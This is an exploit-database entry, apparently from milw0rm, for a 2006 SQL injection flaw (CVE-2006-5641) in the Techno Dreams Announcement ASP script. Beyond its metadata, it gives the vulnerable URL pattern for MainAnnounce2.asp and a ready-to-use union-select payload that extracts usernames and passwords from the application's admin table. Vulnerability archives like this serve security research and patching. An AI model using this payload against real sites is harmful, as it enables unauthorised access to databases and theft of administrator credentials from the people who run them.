[] NeoSense

Techno Dreams Announcement - 'key' SQL Injection

Author: ajann
type: webapps
platform: asp
port: 
date_added: 2006-10-29 
date_updated:  
verified: 1 
codes: OSVDB-30148;CVE-2006-5641 
tags: 
aliases:  
screenshot_url:  
application_url: 

*******************************************************************************
# Title  :  Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability
# Author :   ajann
# Script Page: http://www.t-dreams.com

*******************************************************************************

###http://[target]/[path]/MainAnnounce2.asp?key=[  SQL ]

Example:

//MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-10-30]